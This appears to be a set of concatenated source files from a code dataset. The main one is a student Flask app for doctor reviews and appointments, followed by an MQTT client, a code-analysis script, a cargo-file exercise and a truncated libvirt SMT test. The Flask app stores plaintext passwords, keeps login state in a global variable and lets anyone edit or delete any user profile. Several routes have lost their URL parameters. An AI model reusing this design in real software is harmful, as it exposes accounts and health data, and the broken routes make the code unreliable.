None\n\n# Create a Form Class\n\nclass LoginForm(FlaskForm):\n uni = StringField(\"UNI\", validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewUserForm(FlaskForm):\n first_name = StringField(\"First Name\", validators=[DataRequired()])\n last_name = StringField(\"Last Name\", validators=[DataRequired()])\n uni = StringField(\"UNI\", validators=[DataRequired()])\n password = PasswordField(\"Password\", validators=[DataRequired()])\n age = IntegerField(\"Age\", validators=[DataRequired()])\n school = StringField(\"School\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditUserForm(FlaskForm):\n first_name = StringField(\"First Name\", validators=[DataRequired()])\n last_name = StringField(\"Last Name\", validators=[DataRequired()])\n # uni = StringField(\"UNI\", validators=[DataRequired()])\n # password = PasswordField(\"Password\", validators=[DataRequired()])\n age = IntegerField(\"Age\", validators=[DataRequired()])\n school = StringField(\"School\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewReviewForm(FlaskForm):\n date_of_visit = DateField(\"Date of Visit\", validators=[DataRequired()])\n rating = IntegerField(\"Rating\", validators=[DataRequired(), NumberRange(min=1, max=5)])\n content = TextAreaField(\"Review Content\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditReviewForm(FlaskForm):\n date_of_visit = DateField(\"Date of Visit\", validators=[DataRequired()])\n rating = IntegerField(\"Rating\", validators=[DataRequired(), NumberRange(min=1, max=5)])\n content = TextAreaField(\"Review Content\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass NewAptForm(FlaskForm):\n apt_date = DateField(\"Date of Appointment\", validators=[DataRequired()])\n apt_time = TimeField(\"Time of Appointment\", validators=[DataRequired()])\n concern_description = TextAreaField(\"Concern Description\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass EditAptForm(FlaskForm):\n apt_date = DateField(\"Date of Appointment\", validators=[DataRequired()])\n apt_time = TimeField(\"Time of Appointment\", validators=[DataRequired()])\n 
concern_description = TextAreaField(\"Concern Description\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\nclass SearchForm(FlaskForm):\n searched = StringField(\"Searched\", validators=[DataRequired()])\n submit = SubmitField(\"Submit\")\n\n# Runs at beginning of every web request; sets up db connection\n@app.before_request\ndef before_request():\n try:\n g.conn = engine.connect()\n g.user = current_user\n\n except:\n print(\"uh oh, problem connecting to database\")\n import traceback; traceback.print_exc()\n g.conn = None\n\n# Runs at end of every web request; closes the database connection\n# If you don't, the database could run out of memory\n@app.teardown_request\ndef teardown_request(exception):\n try:\n g.user = current_user\n g.conn.close()\n except Exception as e:\n pass\n\n# ROUTES\n\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n@app.route('/doctors')\ndef doctors():\n cursor = g.conn.execute(\"SELECT * FROM doctors\")\n all_doctors = []\n for result in cursor:\n all_doctors.append(result)\n cursor.close()\n context = dict(data = all_doctors)\n\n return render_template(\"doctors.html\", **context)\n\n@app.route('/doctors/<npi>')\ndef doctor(npi):\n cursor = g.conn.execute(\"SELECT * FROM doctors\")\n doctor_info = []\n for result in cursor:\n if result['npi'] == npi:\n doctor_info.append(result)\n cursor.close()\n\n cursor = g.conn.execute(\"SELECT * FROM doctors AS D, writes AS W, reviews AS R WHERE D.npi = W.npi AND W.review_id=R.review_id\")\n doctor_reviews = []\n for result in cursor:\n if result['npi'] == npi:\n doctor_reviews.append(result)\n cursor.close()\n\n # Check if doctor is saved by current user\n cursor = g.conn.execute(\"SELECT * FROM saves AS S WHERE S.npi=%s AND S.uni=%s\", npi, current_user)\n saved = cursor.fetchone()\n cursor.close()\n \n context = dict(info = doctor_info[0], reviews = doctor_reviews, saved=saved)\n return render_template(\"doctor.html\", **context)\n\n@app.route('/users')\ndef users():\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n all_users = []\n for result in cursor:\n all_users.append(result)\n cursor.close()\n context = dict(data = all_users)\n return render_template(\"users.html\", **context)\n\n@app.route('/users/<uni>')\ndef user(uni):\n\n if not current_user or g.user != uni:\n flash(\"You do not have access to other students' profiles\")\n return redirect(url_for('users'))\n\n # Get only user information\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n user_info = []\n for result in cursor:\n if result['uni'] == uni:\n user_info.append(result)\n cursor.close()\n \n # Get specific user + saved doctors\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS S, saves AS V, doctors AS D WHERE S.uni = V.uni AND D.npi=V.npi\")\n saved_doctors = []\n for result in cursor:\n if result['uni'] == uni:\n saved_doctors.append(result)\n cursor.close()\n\n # Get specific user + reviews\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS S, writes AS W, reviews AS R WHERE S.uni = W.uni AND W.review_id=R.review_id\")\n user_revs = []\n for result in cursor:\n if result['uni'] == uni:\n user_revs.append(result)\n cursor.close()\n \n # Get specific user + appointments\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS Q, studentPatients AS S, doctors AS D, appointments AS A, schedules AS H WHERE Q.cms = H.cms AND S.uni = H.uni AND D.npi = H.npi AND A.apt_id=H.apt_id\")\n user_apts = []\n for result in cursor:\n if result['uni'] == uni:\n user_apts.append(result)\n 
cursor.close()\n\n context = dict(info = user_info[0], saved = saved_doctors, reviews = user_revs, appointments = user_apts)\n return render_template(\"user.html\", **context)\n\n@app.route('/newUser', methods=['GET','POST'])\ndef newUser():\n first_name = None\n last_name = None\n uni = None\n password = None\n age = None\n school = None\n form = NewUserForm()\n if form.validate_on_submit():\n # Grab information\n first_name = form.first_name.data\n last_name = form.last_name.data\n uni = form.uni.data\n password = form.password.data\n age = form.age.data\n school = form.school.data\n # Set fields empty again\n form.first_name.data = ''\n form.last_name.data = ''\n form.uni.data = ''\n form.password.data = ''\n form.age.data = ''\n form.school.data = ''\n \n # Push to database\n args = (first_name, last_name, uni, password, age, school)\n g.conn.execute(\"INSERT INTO studentpatients VALUES (%s, %s, %s, %s, %s, %s)\", args)\n global current_user\n current_user = uni\n g.user = current_user\n return redirect(\"/users/\" + current_user)\n\n return render_template(\"newUser.html\", \n first_name=first_name,\n last_name = last_name,\n uni = uni,\n password = password,\n age = age,\n school = school,\n form=form)\n\n@app.route('/users/<uni>/edit', methods=['GET','POST'])\ndef editUser(uni):\n\n # Get this user's information\n cursor = g.conn.execute(\"SELECT * FROM studentPatients\")\n user_info = []\n for result in cursor:\n if result['uni'] == uni:\n user_info.append(result)\n cursor.close()\n user = user_info[0]\n\n # Populate form with current information\n form = EditUserForm(request.form, obj = user)\n\n if form.validate_on_submit():\n # Grab new information\n first_name = form.first_name.data\n last_name = form.last_name.data\n age = form.age.data\n school = form.school.data\n\n # Set fields empty again\n form.first_name.data = ''\n form.last_name.data = ''\n form.age.data = ''\n form.school.data = ''\n \n # Push edits to database\n g.conn.execute(\"UPDATE studentpatients SET first_name=%s, last_name=%s, age=%s, school=%s WHERE uni=%s\", first_name, last_name, age, school, uni)\n\n flash(\"Profile Information Updated Successfully\")\n global current_user\n current_user = uni\n g.user = current_user\n return redirect(\"/users/\" + current_user)\n\n return render_template(\"editUser.html\", form=form)\n\n@app.route('/users/<uni>/delete', methods=['GET','DELETE'])\ndef deleteUser(uni):\n # Push delete to database\n g.conn.execute(\"DELETE FROM studentpatients WHERE uni=%s\", uni)\n\n flash(\"Profile Deleted\")\n global current_user\n current_user = None\n return redirect('/login')\n\n@app.route('/reviews/<review_id>')\ndef review(review_id):\n\n # Find the student who wrote the review\n cursor = g.conn.execute(\"SELECT uni FROM writes WHERE review_id=%s\", review_id)\n writer = cursor.fetchone()\n cursor.close()\n\n # Get review information\n cursor = g.conn.execute(\"SELECT * FROM doctors AS D, writes AS W, reviews AS R WHERE D.npi = W.npi AND W.review_id=R.review_id\")\n review_result = []\n for result in cursor:\n if result['review_id'] == int(review_id):\n review_result.append(result)\n cursor.close()\n context = dict(data = review_result[0], writer = writer[0])\n\n return render_template(\"review.html\", **context)\n\n@app.route('/newReview/<npi>', methods=['POST', 'GET'])\ndef newReview(npi):\n\n if not current_user:\n flash(\"Please login to leave a review\")\n return redirect(\"/login\")\n\n date_of_visit = None\n rating = None\n content = None\n\n form = NewReviewForm()\n if form.validate_on_submit():\n 
date_of_visit = form.date_of_visit.data\n rating = form.rating.data\n content = form.content.data\n\n form.date_of_visit.data = ''\n form.rating.data = ''\n form.content.data = ''\n\n # Get new review id\n review_id = str(add_to_review_count())\n\n args_review = (review_id, date_of_visit, content, rating)\n g.conn.execute(\"INSERT INTO reviews VALUES (%s, %s, %s, %s)\", args_review)\n\n date_written = datetime.now()\n args_writes = (npi, current_user, review_id, date_written)\n g.conn.execute(\"INSERT INTO writes VALUES (%s, %s, %s, %s)\", args_writes)\n\n return redirect(\"/reviews/\" + review_id)\n\n return render_template(\"newReview.html\",\n date_of_visit = date_of_visit,\n rating = rating,\n content = content,\n form=form)\n\ndef add_to_review_count():\n cursor = g.conn.execute(\"SELECT max(review_id) FROM reviews\")\n count = cursor.fetchone()[0] + 1\n cursor.close()\n return count\n\n@app.route('/reviews/<review_id>/edit', methods=['POST', 'GET'])\ndef editReview(review_id):\n\n if not current_user:\n flash(\"Please login to edit your review\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM writes WHERE review_id=%s AND uni=%s\", review_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to edit other students' reviews\")\n return redirect(\"/users/\" + current_user)\n\n # Get this review's information\n cursor = g.conn.execute(\"SELECT * FROM reviews WHERE review_id=%s\", review_id)\n review = cursor.fetchone()\n cursor.close() # the cursor can be closed once the row has been fetched\n\n # Populate form with current information\n form = EditReviewForm(request.form, obj = review)\n\n if form.validate_on_submit():\n # Grab new information\n date_of_visit = form.date_of_visit.data\n rating = form.rating.data\n content = form.content.data\n\n # Set fields empty again\n form.date_of_visit.data = ''\n form.rating.data = ''\n form.content.data = ''\n \n # Push edits to database\n g.conn.execute(\"UPDATE reviews SET date_of_visit=%s, rating=%s, content=%s WHERE review_id=%s\", date_of_visit, rating, content, review_id)\n\n return redirect(\"/reviews/\" + str(review['review_id']))\n\n return render_template(\"editReview.html\", form=form)\n\n@app.route('/reviews/<review_id>/delete', methods=['GET','DELETE'])\ndef deleteReview(review_id):\n\n if not current_user:\n flash(\"Please login to delete your review\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM writes WHERE review_id=%s AND uni=%s\", review_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to delete other students' reviews\")\n return redirect(\"/users/\" + current_user)\n\n\n # Push delete to database\n g.conn.execute(\"DELETE FROM writes WHERE review_id=%s\", review_id)\n g.conn.execute(\"DELETE FROM reviews WHERE review_id=%s\", review_id)\n\n flash(\"Review Deleted\")\n return redirect(\"/users/\" + current_user)\n\n@app.route('/login', methods=['GET','POST'])\ndef login():\n form = LoginForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n # Find correct user\n cursor = g.conn.execute(\"SELECT * FROM studentpatients\")\n users = []\n for result in cursor:\n if result['uni'] == form.uni.data:\n users.append(result)\n cursor.close()\n \n if users:\n user = users[0]\n # Password verification\n if(form.password.data == user['password']):\n global current_user \n current_user = user.uni\n url = 'users/' + str(user.uni)\n return redirect(url)\n else:\n flash(\"Wrong 
Password\")\n else:\n flash(\"User does not exist\")\n return render_template(\"login.html\", form=form)\n\n@app.route(\"/logout\")\ndef logout():\n global current_user\n if current_user == None:\n flash(\"No one is signed in\")\n else:\n current_user = None\n return redirect(url_for('index'))\n\n@app.route(\"/doctors//save\")\ndef save(npi):\n if not current_user:\n flash(\"Please login to save a doctor first\")\n return redirect(url_for('login'))\n else:\n # Push to database\n args = (current_user, npi)\n g.conn.execute(\"INSERT INTO saves VALUES (%s, %s)\", args)\n return redirect(\"/doctors/\" + npi)\n\n@app.route('/doctors//save/delete', methods=['GET','DELETE'])\ndef deleteSave(npi):\n\n if not current_user:\n flash(\"Please login to remove this doctor from your saved list\")\n return redirect(\"/login\")\n \n # Push delete to database\n g.conn.execute(\"DELETE FROM saves WHERE npi=%s AND uni=%s\", npi, current_user)\n return redirect(\"/doctors/\" + npi)\n\n@app.route('/apts/')\ndef apt(apt_id):\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not current_user or not student:\n flash(\"You do not have access to other students' appointment information\")\n return redirect(url_for('users'))\n\n cursor = g.conn.execute(\"SELECT * FROM studentPatients AS P, doctors AS D, appointments AS A, schedules AS S, works_at AS W WHERE W.cms = S.cms AND P.uni = S.uni AND D.npi = S.npi AND W.npi = D.npi AND A.apt_id=S.apt_id AND A.apt_id=%s\", apt_id)\n apt_result = cursor.fetchone()\n cursor.close()\n\n # Get Hospital information\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS H, schedules as S WHERE H.cms = S.cms AND S.npi = %s\", apt_result['npi'])\n hospital_info = cursor.fetchone()\n cursor.close()\n context = dict(data = apt_result, hospital = hospital_info)\n\n return render_template(\"apt.html\", **context)\n\n@app.route('/newApt/', methods=['POST', 'GET'])\ndef newApt(npi):\n\n if not current_user:\n flash(\"Please login to book an appointment\")\n return redirect(\"/login\")\n\n apt_date = None\n apt_time = None\n concern_description = None\n\n form = NewAptForm()\n\n if form.validate_on_submit():\n apt_date = form.apt_date.data\n apt_time = form.apt_time.data\n concern_description = form.concern_description.data\n\n form.apt_date.data = ''\n form.apt_time.data = ''\n form.concern_description.data = ''\n\n # Get new appointment id\n apt_id = str(add_to_apt_count())\n\n args_apt = (apt_id, apt_date, apt_time, concern_description)\n g.conn.execute(\"INSERT INTO appointments VALUES (%s, %s, %s, %s)\", args_apt)\n\n # Get Hospital information\n cursor = g.conn.execute(\"SELECT * FROM hospitals AS H, schedules as S WHERE H.cms = S.cms AND S.npi = %s\", npi)\n hospital_info = cursor.fetchone()\n cursor.close()\n\n args_schedules = (npi, hospital_info['cms'], apt_id, current_user)\n g.conn.execute(\"INSERT INTO schedules VALUES (%s, %s, %s, %s)\", args_schedules)\n\n return redirect(\"/apts/\" + apt_id)\n\n return render_template(\"newApt.html\",\n apt_date = apt_date,\n apt_time = apt_time,\n concern_description = concern_description,\n form=form)\n\ndef add_to_apt_count():\n cursor = g.conn.execute(\"SELECT max(apt_id) FROM appointments\")\n count = cursor.fetchone()[0] + 1\n cursor.close()\n return count\n\n@app.route('/apts//edit', methods=['POST', 'GET'])\ndef editApt(apt_id):\n\n if not current_user:\n flash(\"Please login to edit an appointment\")\n return 
redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to edit other students' appointments\")\n return redirect(\"/users/\" + current_user)\n\n # Get this apts's information\n cursor = g.conn.execute(\"SELECT * FROM appointments WHERE apt_id=%s\", apt_id)\n apt = cursor.fetchone()\n cursor.close()\n\n # Populate form with current information\n form = EditAptForm(request.form, obj = apt)\n\n if form.validate_on_submit():\n # Grab new information\n apt_date = form.apt_date.data\n apt_time = form.apt_time.data\n concern_description = form.concern_description.data\n\n # Set fields empty again\n form.apt_date.data = ''\n form.apt_time.data = ''\n form.concern_description.data = ''\n\n # Push edits to database\n g.conn.execute(\"UPDATE appointments SET apt_date=%s, apt_time=%s, concern_description=%s WHERE apt_id=%s\", apt_date, apt_time, concern_description, apt_id)\n\n flash(\"Appointment Updated Successfully\")\n return redirect(\"/apts/\" + str(apt['apt_id']))\n\n return render_template(\"editApt.html\", form=form)\n\n@app.route('/apts//delete', methods=['GET','DELETE'])\ndef deleteApt(apt_id):\n\n if not current_user:\n flash(\"Please login to delete an appointment\")\n return redirect(\"/login\")\n\n cursor = g.conn.execute(\"SELECT * FROM schedules WHERE apt_id=%s AND uni=%s\", apt_id, current_user)\n student = cursor.fetchone()\n cursor.close()\n\n if not student:\n flash(\"You do not have access to delete other students' appointments\")\n return redirect(\"/users/\" + current_user)\n \n # Push delete to database\n g.conn.execute(\"DELETE FROM schedules WHERE apt_id=%s\", apt_id)\n g.conn.execute(\"DELETE FROM appointments WHERE apt_id=%s\", apt_id)\n\n flash(\"Appointment Cancelled\")\n return redirect(\"/users/\" + current_user)\n\n# Pass stuff to base.html; will pass thing\n@app.context_processor\ndef base():\n form = SearchForm()\n return dict(form=form)\n\n@app.route('/search', methods=['POST'])\ndef search():\n form = SearchForm()\n \n docs = []\n\n # Get data from search box\n query = form.searched.data\n query = query.strip()\n\n if(len(query) == 0):\n return redirect('/doctors')\n\n if form.validate_on_submit():\n\n # Query by specialty or description\n q = f'%{query}%'\n cursor = g.conn.execute(\"SELECT * FROM doctors WHERE first_name ILIKE %s OR last_name ILIKE %s OR job_title ILIKE %s OR about ILIKE %s\", q, q, q, q)\n for result in cursor:\n if (result not in docs):\n docs.append(result)\n cursor.close()\n\n docs_set = list(set(docs))\n context = dict(data = docs_set)\n\n return render_template(\"search_doc.html\", **context, form=form, searched=query)\n\n\nif __name__ == \"__main__\":\n import click\n\n @click.command()\n @click.option('--debug', is_flag=True)\n @click.option('--threaded', is_flag=True)\n @click.argument('HOST', default='0.0.0.0')\n @click.argument('PORT', default=8111, type=int)\n def run(debug, threaded, host, port):\n\n HOST, PORT = host, port\n print(\"running on %s:%d\" % (HOST, PORT))\n app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)\n\n run()\n","repo_name":"ayshajamjam/columbiaInsurance","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":22372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"13333336506","text":"import paho.mqtt.client as mqtt\r\nimport time,logging\r\n\r\nbroker=\"test.mosquitto.org\"\r\nport=1883\r\n\r\nCLEAN_SESSION=True\r\nlogging.basicConfig(level=logging.INFO) \r\n\r\ndef on_subscribe(client, userdata, mid, granted_qos): \r\n time.sleep(1)\r\n logging.info(\"sub acknowledge message id=\"+str(mid))\r\n pass\r\n\r\ndef on_disconnect(client, userdata,rc=0):\r\n logging.info(\"DisConnected result code \"+str(rc))\r\n\r\n\r\ndef on_connect(client, userdata, flags, rc):\r\n logging.info(\"Connected flags\"+str(flags)+\"result code \"+str(rc))\r\n\r\n\r\ndef on_message(client, userdata, message):\r\n msg=str(message.payload.decode(\"utf-8\"))\r\n print(\"message received \" +msg)\r\n \r\ndef on_publish(client, userdata, mid):\r\n logging.info(\"message published \" +str(mid))\r\n\r\ntopic1 =\"house/client_b\"\r\nclient= mqtt.Client(\"ClientB\",False) \r\n\r\nclient.on_subscribe = on_subscribe \r\nclient.on_disconnect = on_disconnect \r\nclient.on_connect = on_connect \r\nclient.on_message=on_message\r\nclient.connect(broker,port) #establish connection\r\ntime.sleep(1)\r\nclient.loop_start()\r\nclient.subscribe(\"house/client_a\")\r\ncount=1\r\nwhile True: \r\n print(\"publishing on topic \",topic1)\r\n msg=\"message \" +str(count) + \" from client B\"\r\n #client.publish(topic1,msg)\r\n count +=1\r\n time.sleep(5)\r\nclient1.disconnect()\r\n\r\nclient1.loop_stop()\r\n\r\n","repo_name":"Youcef0012/MQTT","sub_path":"Python/clientb.py","file_name":"clientb.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"37162556243","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 20 13:18:13 2018\r\n\r\n@author: Laine Rumreich\r\n\r\nProgram to read in a text file wih FEH SDP code and analyze it for coding \r\ntechniques, complexity, and good and bad coding practices. Then, print \r\nthe results to an excel spreadsheet.\r\n\"\"\" \r\n\r\n# Python imports\r\nimport os\r\nfrom openpyxl import Workbook\r\n\r\n# Local imports\r\nfrom printOutput import printOutput\r\nfrom parseFile import parseFile\r\nfrom writeHeader import writeHeader\r\nfrom cleanFile import cleanFile \r\n\r\ndef main():\r\n \r\n # Define excel spreadsheet variables\r\n lineNum = 2 # The line the current output should be written on\r\n lineString = \"A\"\r\n \r\n # Ask the user for a text input file that contains all the filenames for the \r\n # SDP text files to analyze\r\n nameList = input(\"Enter a file with the names of the files to analyze: \")\r\n \r\n # Open the .txt data file containing list of filenames\r\n if(not os.path.isfile(nameList)):\r\n print(\"No such file or directory: '\" + nameList + \"'\")\r\n return\r\n nameFile = open(nameList, 'r') \r\n name = nameFile.readline()\r\n \r\n # Open an excel spreadsheet to print the output\r\n wb = Workbook() # Open the output file\r\n output = wb.active # Get the active worksheet\r\n writeHeader(output) # Write the header to the output file\r\n \r\n # Read in each file name in the nameFile, and run the program on it\r\n while(name):\r\n # Open the current file\r\n fileName = name[:-1] # Consume newline character\r\n fileName = \"Data\" + '\\\\' + fileName + \".txt\"\r\n if(not os.path.isfile(fileName)):\r\n print(fileName, \" is not a valid file.\")\r\n name = nameFile.readline()\r\n continue\r\n dataFile = open(fileName, 'r')\r\n \r\n # Compute which line the current output should go on\r\n lineString = lineString[0]\r\n lineString = lineString + str(lineNum)\r\n \r\n # Print the name of the current file\r\n output[lineString] = name\r\n \r\n # Clean up the current file for easier analysis\r\n cleanFile(dataFile, fileName)\r\n dataFile.close()\r\n \r\n # Access the edited data file created in cleanFile, to be deleted later\r\n editedDataFileName = fileName[:5] + \"edited\" + fileName[5:]\r\n editedDataFile = open(editedDataFileName, 'r')\r\n \r\n counts = {'lines': 0,\r\n 'comments': 0,\r\n 'forLoops': 0,\r\n 'whileLoops': 0,\r\n 'nestedLoops': 0,\r\n 'highestNestedLoop': 0, #TODO\r\n 'ifElse': 0,\r\n 'nestedIfs': 0,\r\n 'time': 0,\r\n 'rand': 0,\r\n 'input': 0,\r\n 'plot': 0,\r\n 'print': 0,\r\n 'switch': 0,\r\n 'cyclomatic': 0,\r\n 'cyclAvg': 0,\r\n 'cyclMed': 0,\r\n 'halsteadVolume': 0,\r\n 'halsteadDifficulty': 0,\r\n 'halsteadEffort': 0,\r\n 'maintainability': 0,\r\n 'userFunc': 0,\r\n 'addFunc': 0} #TODO\r\n \r\n # Read in the data from the input file and perform the primary analysis\r\n parseFile(editedDataFileName, editedDataFile, counts)\r\n \r\n # Print the results of the analysis to the output excel file\r\n printOutput(output, lineNum, counts)\r\n print(\"Finished reading in file: \", fileName)\r\n lineNum += 1\r\n \r\n # Close the current (edited) input data file\r\n editedDataFile.close()\r\n \r\n # Remove the edited file\r\n os.remove(editedDataFileName)\r\n \r\n # Read in the next name from the nameFile\r\n name = nameFile.readline()\r\n \r\n # Close the user-entered file of program names \r\n nameFile.close()\r\n \r\n # Save the output file\r\n wb.save(\"output.xlsx\")\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n print(\"Done with 
program. Exiting...\")\r\n","repo_name":"LaineRumreich/SDP-analysis","sub_path":"mainSDPparser.py","file_name":"mainSDPparser.py","file_ext":"py","file_size_in_byte":4072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33112029549","text":"# ============================================ file handling slide\n\n# Stop suffering each other\n# There are too many cargo items, it is placed in a text file.\n# The file includes cargo item name and its weight\n# Load all cargo items from text file to store it in a list of dictionaries\n\ncargo_items = []\n\nwith open('cargo.txt', 'r+') as file:\n for line in file:\n line_extract = line.split('=')\n item = {'name': line_extract[0], 'cargo_weight': float(line_extract[1])}\n cargo_items.append(item)\n\nprint(cargo_items)\n","repo_name":"linhhonblade/hello-python","sub_path":"practices/solutions/practice5.py","file_name":"practice5.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30436117129","text":"import time\nimport logging as log\nimport re\n\nfrom avocado.utils import process\nfrom avocado.utils import astring\n\nfrom virttest.libvirt_xml import vm_xml\nfrom virttest import utils_package\nfrom virttest import virt_vm\n\n\n# Using as lower capital is not the best way to do, but this is just a\n# workaround to avoid changing the entire file.\nlogging = log.getLogger('avocado.' + __name__)\n\n\ndef run(test, params, env):\n \"\"\"\n libvirt smt test:\n 1) prepare the guest with given topology\n 2) Start and login to the guest\n 3) Check for ppc64_cpu --smt and smt should be on\n 4) ppc64_cpu --smt=off and smt should be off\n 5) ppc64_cpu --smt=on and smt should be on\n 6) Check for core present using ppc64_cpu\n 7) Check for online core using ppc64_cpu\n 8) Check for lscpu for thread, core, socket info updated properly\n 9) Change the number of cores and check in lscpu\n\n :param test: QEMU test object\n :param params: Dictionary with the test parameters\n :param env: Dictionary with test environment.\n \"\"\"\n error_count = 0\n\n def smt_check(vm, cmd, output, extra=None, ignorestatus=False):\n \"\"\"\n Run and check SMT command inside guest\n\n :param vm: VM object\n :param cmd: Given smt command\n :param output: Expected output\n :param extra: Extra output to be added\n :param ignorestatus: True or False to ignore status\n :return: error count\n \"\"\"\n err_count = 0\n session = vm.wait_for_login()\n actual_output = session.cmd_output(cmd).strip()\n return_output = session.cmd_output('echo $?').strip()\n if extra:\n expected_output = output + extra\n else:\n expected_output = output\n if expected_output != actual_output:\n logging.error(\"Command: %s failed\\nActual output: %s\\nExpected \"\n \"output: %s\", cmd, actual_output, expected_output)\n if int(return_output) == 0 and not ignorestatus:\n logging.error(\"Command: %s returned zero\"\n \"\\n Expecting a non zero number\", cmd)\n err_count = 1\n else:\n if int(return_output) != 0 and not ignorestatus:\n logging.error(\"Command: %s returned non-zero\"\n \"\\n Expecting zero\", cmd)\n err_count += 1\n else:\n logging.debug(\"Command: %s ran successfully\", cmd)\n session.close()\n return err_count\n\n def cpus_info(vm, env=\"guest\"):\n \"\"\"\n To get host cores, threads, sockets in the system\n\n :param vm: VM object\n :param env: guest or host\n :return: cpu sockets, cores, threads info as list\n \"\"\"\n if \"guest\" in env:\n session = vm.wait_for_login()\n output = session.cmd_output(\"lscpu\")\n else:\n output = astring.to_text(process.system_output(\"lscpu\", shell=True))\n no_cpus = int(re.findall('CPU\\(s\\):\\s*(\\d+)', str(output))[0])\n no_threads = int(re.findall('Thread\\(s\\)\\sper\\score:\\s*(\\d+)', str(output))[0])\n no_cores = int(re.findall('Core\\(s\\)\\sper\\ssocket:\\s*(\\d+)', str(output))[0])\n no_sockets = int(re.findall('Socket\\(s\\):\\s*(\\d+)', str(output))[0])\n cpu_info = [no_cpus, no_threads, no_cores, no_sockets]\n if \"guest\" in env:\n session.close()\n return cpu_info\n\n vm_name = params.get(\"main_vm\")\n smt_chk_cmd = params.get(\"smt_chk_cmd\", \"ppc64_cpu --smt\")\n smt_on_cmd = params.get(\"smt_on_cmd\", \"ppc64_cpu --smt=on\")\n smt_off_cmd = params.get(\"smt_off_cmd\", \"ppc64_cpu --smt=off\")\n smt_core_pst_cmd = params.get(\"smt_core_present_cmd\",\n \"ppc64_cpu --cores-present\")\n smt_core_on_cmd = params.get(\"smt_core_on_cmd\", \"ppc64_cpu --cores-on\")\n smt_chk_on_output = params.get(\"smt_chk_on_output\", \"SMT is on\")\n 
smt_chk_off_output = params.get(\"smt_chk_off_output\", \"SMT is off\")\n smt_core_pst_output = params.get(\"smt_core_pst_output\",\n \"Number of cores present =\")\n smt_core_on_output = params.get(\"smt_core_on_output\",\n \"Number of cores online =\")\n smt_threads_per_core_cmd = params.get(\"smt_threads_per_core_cmd\",\n \"ppc64_cpu --threads-per-core\")\n smt_threads_per_core_output = params.get(\"smt_threads_per_core_ouput\",\n \"Threads per core:\")\n status_error = params.get(\"status_error\", \"no\") == \"yes\"\n ignore_status = params.get(\"ignore_status\", \"no\") == \"yes\"\n\n smt_number = params.get(\"smt_number\", None)\n max_vcpu = current_vcpu = int(params.get(\"smt_smp\", 8))\n vm_cores = int(params.get(\"smt_vcpu_cores\", 8))\n vm_threads = int(params.get(\"smt_vcpu_threads\", 1))\n vm_sockets = int(params.get(\"smt_vcpu_sockets\", 1))\n vm = env.get_vm(vm_name)\n\n output = astring.to_text(process.system_output(smt_threads_per_core_cmd, shell=True))\n try:\n host_threads = int(re.findall('Threads per core:\\s+(\\d+)', output)[0])\n except Exception as err:\n test.cancel(\"Unable to get the host threads\\n %s\" % err)\n\n logging.info(\"Guest: cores:%d, threads:%d, sockets:%d\", vm_cores,\n vm_threads, vm_sockets)\n try:\n vmxml = vm_xml.VMXML.new_from_inactive_dumpxml(vm_name)\n org_xml = vmxml.copy()\n vm.destroy()\n # Initial Setup of vm\n vmxml.set_vm_vcpus(vm_name, max_vcpu, current_vcpu,\n vm_sockets, vm_cores, vm_threads,\n add_topology=True)\n try:\n vm.start()\n if status_error:\n test.fail(\"VM Started with invalid thread %s\" % vm_threads)\n except virt_vm.VMStartError as detail:\n if not status_error:\n test.fail(\"VM failed to start %s\" % detail)\n\n if not status_error:\n # try installing powerpc-utils in guest if not skip\n try:\n session = vm.wait_for_login()\n utils_package.package_install([\"powerpc-utils\"], session, 360)\n session.close()\n except Exception as err:\n test.cancel(\"Unable to install powerpc-utils package in guest\\n %s\" % err)\n # Changing the smt number\n if smt_number:\n smt_chk_cmd_mod = \"%s=%s\" % (smt_chk_cmd, smt_number)\n error_count += smt_check(vm, smt_chk_cmd_mod, \"\")\n\n guest_cpu_details = cpus_info(vm)\n # Step 10: Check for threads, cores, sockets\n if vm_cores != guest_cpu_details[2]:\n logging.error(\"Number of cores mismatch:\\nExpected number of \"\n \"cores: %s\\nActual number of cores: %s\",\n vm_cores, guest_cpu_details[2])\n error_count += 1\n if smt_number:\n threads = int(smt_number)\n else:\n threads = vm_threads\n if threads != guest_cpu_details[1]:\n logging.error(\"Number of threads mismatch:\\nExpected number of \"\n \"threads: %s\\nActual number of threads: %s\",\n threads, guest_cpu_details[1])\n 